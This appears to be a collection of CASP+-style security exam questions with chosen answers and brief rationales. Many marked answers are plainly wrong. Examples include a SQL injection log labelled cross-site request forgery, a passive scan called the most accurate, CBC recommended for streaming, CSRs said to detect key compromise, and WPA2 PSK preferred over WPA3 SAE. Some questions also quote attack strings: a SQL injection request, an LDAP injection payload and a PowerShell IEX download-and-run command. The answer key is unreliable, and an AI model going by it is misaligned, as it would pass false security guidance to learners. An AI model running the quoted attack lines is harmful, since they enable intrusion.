B, E, and H.
B. Data retention policy
E. Data sovereignty policy
H. Encryption standard
An engineer is evaluating the control profile to assign to a system containing PII, financial, and proprietary data.
Data Type - Confidentiality - Integrity - Availability PII - H - M - L Proprietary - H - H - M Competitive - H - M - M Industrial - L - L - H Financial - M - H - L
Based on the data classification table above, which of the following BEST describes the overall classification?
A. High Confidentiality, high availability
B. High confidentiality, medium availability
C. Low availability, low confidentiality
D. High integrity, low availability
B. High confidentiality, medium availability
An engineer is assisting with the design of a new virtualized environment that will house critical company services and reduce the datacenter’s physical footprint. The company has expressed concern about the integrity of operating systems and wants to ensure a vulnerability exploited in one datacenter segment would not lead to the compromise of all others. Which of the following design objectives should the engineer complete to BEST mitigate the company’s concerns? (Choose two.)
A. Deploy virtual desktop infrastructure with an OOB management network.
B. Employ the use of vTPM with boot attestation.
C. Leverage separate physical hardware for sensitive services and data.
D. Use a community CSP with independently managed security services.
E. Deploy to a private cloud with hosted hypervisors on each physical machine.
A and C.
A. Deploy virtual desktop infrastructure with an OOB management network.
C. Leverage separate physical hardware for sensitive services and data.
OOB and Leverage
The code snippet below controls all electronic door locks to a secure facility in which the doors should only fail open in an emergency. In the code, “criticalValue” indicates if an emergency is underway:
try {
if (criticalValue)
OpenDoors=true
else
OpenDoors=false
} catch (e) {
OpenDoors=true
}
Which of the following is the BEST course of action for a security analyst to recommend to the software developer?
A. Rewrite the software to implement fine-grained, conditions-based testing.
B. Add additional exception handling logic to the main program to prevent doors from being opened.
C. Apply for a life-safety-based risk exception allowing secure doors to fail open.
D. Rewrite the software’s exception handling routine to fail in a secure state.
B. Add additional exception handling logic to the main program to prevent doors from being opened.
An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization’s headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:
- Low latency for all mobile users to improve the users’ experience
- SSL offloading to improve web server performance
- Protection against DoS and DDoS attacks
- High availability
Which of the following should the organization implement to BEST ensure all requirements are met?
A. A cache server farm in its datacenter
B. A load-balanced group of reverse proxy servers with SSL acceleration
C. A CDN with the origin set to its datacenter
D. Dual gigabit-speed Internet connections with managed DDoS prevention
B. A load-balanced group of reverse proxy servers with SSL acceleration
SSL offloading - Reverse proxy servers with SSL acceleration
A systems administrator is preparing to run a vulnerability scan on a set of information systems in the organization. The systems administrator wants to ensure that the targeted systems produce accurate information especially regarding configuration settings.
Which of the following scan types will provide the systems administrator with the MOST accurate information?
A. A passive, credentialed scan
B. A passive, non-credentialed scan
C. An active, non-credentialed scan
D. An active, credentialed scan
A. A passive, credentialed scan.
Passive scans instantly pick up new info, whereas active scans have to be scheduled.
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from the various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.
Which of the following should the security administrator do to mitigate the risk?
A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.
B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management.
C. Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash.
D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Management OOB
Given the following log snippet from a web server:
84.55.41.60 - [timestamp] “GET /wordpress/wp-content.plugins/custom_plugin/check_user.php?userid=1 AND (SELECT 6810 FROM(SELECT COUNT(), CONCAT(0x7171787671,(SELECT (ELT(6810=6810,1))),0x71707a7871,FLOOR(RAND(0)2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) HTTP/1.1” 200 166 “-“ “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3)
Gecko/20100401 Firefox 4.0 (.NET CLR 3.5.30729)”
Which of the following BEST describes this type of attack?
A. SQL injection
B. Cross-site scripting
C. Brute-force
D. Cross-site request forgery
D. Cross-site request forgery
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company’s managed database, exposing customer information.
The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach?
A. The pharmaceutical company
B. the cloud software provider
C. The web portal software vendor
D The database software vendor
B. The cloud software provider
CSP - cloud software provider
A host on a company’s network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.
Which of the following steps would be best to perform FIRST?
A. Turn off the infected host immediately.
B. Run a full anti-malware scan on the infected host.
C. Modify the smb.conf file of the host to prevent outgoing SMB connections.
D. Isolate the infected host from the network by removing all network connections.
D. Isolate the infected host from the network by removing all network connections.
Simulation. You are a security analyst tasked with interpreting an Nmap scan output from company’s privileged network.
The company’s hardening guidelines indicate the following:
- There should one one primary server or service per device.
- Only default ports should be used.
- Non-secure protocols should be disabled.
Using the Nmap output, identify the devices on the network and their roles, and any open ports that should be closed.
For each device found by Nmap, add a device entry to the Devices Discovered list with the following information:
- The IP address of the device
- The primary server or service of the device
- The protocols that should be disabled on the hardening guidelines
.65 CrushFTP 22 and 80
.66 Barracuda SMTP 415, 443, and 587
.67 Web Server 21, 80, and 443
.68 SonicWall UTM 21, 443
.65 SFTP Server Disable 8080
.66 Email Server Disable 415 and 443
.67 Web Server Disable 21 and 80
.68 UTM Appliance Disable 21
A company’s product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company’s reputation in the market.
Which of the following should the company implement to address the risk of system unavailability?
A. User and entity behavior analytics
B. Redundant reporting systems
C. A self-healing system
D. Application controls
D. Application controls
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?
A. Biometric authenticators are immutable.
B. The likelihood of account compromise is reduced.
C. Zero trust is achieved.
D. Privacy risks are minimized.
B. The likelihood of account compromise is reduced.
A review of the past year’s attack patterns show that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.
Which of the following would be BEST for the company to implement?
A. A WAF
B. An IDS
C. A SIEM
D. A honeypot
D. A honeypot
Inviting and attack - honeypot
A security architect is reviewing the following proposed corporate firewall architecture and configuration:
FW_A:
Permit 0/0 to 192.168.1.0/24 TCP 80, 443
DENY ALL
FW_B: Permit 10./16 to 192.168.1.0/24 TCP 80, 443 Permit 10.0/16 to 0/0 Permit 192.168.1.0/24 to DB_SERVERS DENY 192.168.1.0/24 to 10./16
- Web servers must receive all updates via HTTP/S from the corporate network.
- Web servers should not initiate communication with the Internet.
- Web servers should only connect to preapproved corporate database servers.
- Employees’ computing devices should only connect to web services over ports 80 and 443.
Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)
A. FW_A: Permit from 10./16 to 0/0 tcp B. FW_A: Permit 192./24 to 0/0 tcp C. FW_A: Permit 10./16 to 0/0 tcp/udp D. FW_B: Permit 0/0 to 10./16 tcp/udp E. FW_B: Permit 10./16 to 0/0 tcp/udp F. FW_B: Permit 192./24 to 10./32 tcp
A and D.
A. FW_A: Permit 10/16 to 0/0 tcp 80,443
D. FW_B: Permit 0/0 to 10/16 tcp/udp
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver’s licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation.
Which of the following BEST describes this process?
A. Deepfake
B. Know your customer
C. Identity proofing
D. Passwordless
C. Identity proofing
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.
Which of the following in the NEXT step of the incident response plan?
A. Remediation
B. Containment
C. Response
D. Recovery
B. Containment
A recent data breach stemmed from unauthorized access to an employee’s company account with a cloud-baed productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information.
Which of the following BEST mitigates inappropriate access and permissions issues?
A. SIEM
B. CASB
C. WAF
D. SOAR
C. WAF
web application firewall
A security engineer is hardening a company’s multihomed SFTP server. When scanning a public facing interface, the engineer finds the following ports are open:
22, 25, 110, 137, 138, 139, 445.
Internal Windows clients are used to transfer files to the server to stage them for customer download as part of the company’s distribution process.
Which of the following would be the BEST solution to harden the system?
A. Close ports 110, 138, and 139. Bind ports 22, 25, and `37 to only the internal interface.
B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.
C. Close ports 22 and 139. Bind ports 137, 138, 445 to only the internal interface.
D. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.
BIND 22
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.
Which of the following should a security architect recommend?
A. A DLP program to identify which files have customer data and delete them
B. An ERP program to identify which process need to be tracked
C. A CMDB to report on systems that are not configured to security baselines
D. A CRM application to consolidate the data and provision access based on the process and need.
C. A CMDB to report on systems that are not configured to security baselines.
A security analyst observes the following while looking through network traffic in a company’s cloud log:
[timestamp] vpcvirtualhost VPCLogs 2242 eni-379ec4f1 10.0.5.52 10.0.5.6 241 79 6 1 40 ACCEPT OK
172.32.6.66 443 REJECT OK
A. Quarantine 100.5.52 and run a malware scan against the host.
B. Access 10.0.5.52 via EDR and identify processes that have network connections.
C. Isolate 10.0.60.6 via security groups.
D. Investigate web logs on 10.0.56.6 to determine if this is normal traffic.
D. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
10.0.50.6 appears to be port scanning, hence the host worth investigating.
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. Isolation control failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
C. Insecure data deletion
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.
Which of the following should the organization consider FIRST to address this requirement?
A. Implement a change management plan to ensure systems are using the appropriate versions.
B. Hire additional on-call staff to be deployed if an event occurs.
C. Design an appropriate warm site for business continuity.
D. Identify critical business processes and determine associated software and hardware requirements.
C. Design an appropriate warm site for business continuity
The only option that addresses the requirement
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:
A. When it is passed across a local network.
B. In memory during processing.
C. When it is written to a system’s solid-state drive.
D. By an enterprise hardware security module.
A. When it is passed across a local network
In-use - Network
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
- Support all phases of the SDLC.
- Use tailored website portal software.
- Allow the company to build and use its own gateway software.
- Utilize its own data management platform.
- Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?
A. SaaS
B. PaaS
C. MaaS
D. IaaS
D. IaaS
The company wants to do everything themselves, so they only want the infrastructure.
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned te disk with an antivirus application and did not find nd IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?
A. Worm
B. Logic bomb
C. Fileless
D. Rootkit
C. Fileless
The disk scan turned up nothing. The malware is fileless.
A development team created a mobile application that contacts a company’s back-end- APIs housed in PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)
A. Bot protection B. OAuth 2.0 C. Input validation D. Autoscaling endpoints E. Rate limiting F. CSRF protection
D and E.
D. Autoscaling endpoint
E. Rate limiting
An organization’s existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?
A. Adding a second redundant layer of alternate vendor VPN concentrators
B. Using Base64 encoding within the existing site-to-site VPN connections
C. Distributing security resources across VPN sites
D. Implementing IDS services with each VPN concentrator
E. Transitioning to a container-based architecture for site-based services
D. Implementing IDS services with each VPN concentrator
IDS
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user’s actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?
A. Encryption in transit B. Legal issues C. Chain of custody D. Order of volatility E. Key exchange
C. Chain of custody
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell “IEX(New-Object Net.WebClient).DownloadString(‘https://content.comptia.org/casp/whois.ps1’);whois”
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
D. Forward proxy and MFA.
MFA
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?
A. Risk rejection
B. Risk mitigation
C. Risk transference
D. Risk avoidance
C. Risk transference
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms.
B. Patch the infrastructure at the operating system.
C. Execute port scanning against the services.
D. Upgrade the service as part of life-cycle management.
A. Securely configure the authentication mechanisms.
A company’s Chief Information Officer wants to implement IDS software onto the current system’s architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?
A. HIPS
B. UEBA
C. HIDS
D. NIDS
C. HIDS
Identifying users and processes requires a host IDS.
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?
A. Software composition analysis
B. Code obfuscation
C. Static analysis
D. Dynamic analysis
D. Dynamic analysis
A forensic investigator would use the foremost command for:
A. cloning disks
B. Analyzing network-captured packets
C. Recovering lost files
D. Extracting features such as email addresses
C. Recovering lost files
foremost recovers lost files based on headers
A software company is developing an application in which data must be encrypted with a cipher that requires the following:
- Initialization vector
- Low latency
- Suitable for streaming
Which of the following ciphers should the company use?
A. Cipher feedback
B. Cipher block chaining message authentication code
C. Cipher block chaining
D. Electronic codebook
C. Cipher block chaining
CBC for streaming
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system s fully operational.
Which of the following BEST describes the reason why the silent failure occurred?
A. The system logs rotated prematurely.
B. The disk utilization alarms are higher than what the service restarts require.
C. The number of nodes in the self-healing cluster was healthy.
D. Conditional checks prior to the service restart succeeded.
B. The disk utilization alarms are high that what the service restarts require.
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?
A. Faraday cage
B. WPA2 PSK
C. WPA3 SAE
D. WEP 128 bit
B. WPA2 PSK
PSK
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?
A. Differential power analysis
B. Differential fault analysis
C. Differential temperature analysis
D. Differential timing analysis
C. Differential temperature analysis
TEMPERATURE
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
A. NAC to control authorized endpoints
B. FIM on the servers storing the data
C. A jump box in the screened subnet
D. A general VPN solution to the primary network
D. A general VPN solution to the primary network.
VPN gives endpoint control and can restrict sensitive data.
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe?
A. Full tunneling
B. Asymmetric routing
C. SSH tunneling
D. Split tunneling
B. Asymmetric routing
Like Cisco AnyConnect
A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
(&(objectClass=)(objectClass=))(&(objectClass=void))(type-admin))
Which of the following would BEST mitigate this vulnerability?
A. Network intrusion prevention
B. Data encoding
C. Input validation
D. CAPTCHA
C. Input validation
injection exploit
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.
Which of the following systems should the consultant review before making a recommendation?
A. CAN
B. ASIC
C. FPGA
D. SCADA
D. SCADA
Company A acquired Company B. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B’s infrastructure could be integrated into Company A’s security program.
Which of the following risk-handling techniques was used?
A. Accept
B. Avoid
C. Transfer
D. Mitigate
D. Mitigate
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but he organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?
A. Assess the residual risk.
B. Update the organization’s threat model.
C. Move to the next risk in the register.
D. Recalculate the magnitude of impact.
D. Recalculate the magnitude of impact.
A software house is developing a new application. The application has the following requirements:
- Reduce the number of credential requests as much as possible
- Integrate with social networks
- Authenticate users
Which of the following is the BEST federation method to use for the application?
A. WS-Federation
B. OpenID
C. OAuth
D. SAML
D. SAML
Security Association Markup Language allows multiple websites to use the same credentials.
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:
- Be efficient at protecting the production environment.
- Not require any change to the application.
- Act at the presentation layer.
Which of the following techniques should be used?
A. Masking
B. Tokenization
C. Algorithmic
D. Random substitution
C. Masking
Masking operates in the presentation layer
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?
A. Lawyers
B. Court
C. Upper management team
D. Police
A. Lawyers
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to unsure no data remnants can be recovered?
A. Drive wiping
B. Degaussing
C. Purging
D. Physical destruction
B. Degaussing
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.
Which of the following techniques would BEST support this?
A. Configuring systemd services to run automatically at startup
B. Creating a backdoor
C. Exploiting an arbitrary code execution exploit
D. Moving laterally to a more authoritative server/service
B. Creating a backdoor
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.
When designing the solution which of the following threats should the security architect focus on to prevent attacks against the OT network?
A. Packets that are the wrong size or length
B. Use of any non-DNP3 communication on a DNP3 port
C. Multiple solicited responses over time
D. Application of an unsupported encryption algorithm
C. Multiple solicited responses over time
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:
- Must have a minimum of 15 characters
- Must use one number
- Must use on capital letter
- Must not be one of the last 12 passwords used
Which of the following policies should be added to provide additional security?
A. Shared accounts B. Password complexity C. Account lockout D. Password history E. Time-based logins
C. Account lockout
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?
A. HSTS
B. CRL
C. CSRs
D. OCSP
C. CSRs
Certificate Signing Requests
Which of the following technologies allows CSPs to add encryption across multiple data storages?
A. Symmetric encryption
B. Homomorphic encryption
C. Data disperion
D. Bit splitting
A. Symmetric encryption
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.
Based on this agreement, this finding is BEST categorized as a:
A. true positive
B. true negative
C. false positive
D. false negative
C. false positive
A company’s Chief Information Security Officer is concerned that he company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.
Which of the following compensating controls would be BEST to implement in this situation?
A. EDR
B. SIEM
C. HIDS
D. UEBA
B. SIEM
SIEM for network logs
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate.
This is an example of:
A. due intelligence
B. e-discovery
C. due care
D. legal hold
A. due intelligence
Which of the following protocols is a low power, low data rate that allow for the creation of PAN networks? A. Zigbee B. CAN C. DNP3 D. Modbus
A. Zigbee
Zigbee is a low-cost low-tech PAN
An organization’s assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.
Given this information, which of the following is a noted risk?
A. Feature delay due to extended software development cycles
B. Financial liability from a vendor data breach
C. Technical impact to the API configuration
D. The possibility of the vendor’s business ceasing operations
B. Financial liability
No insurance - financial liability
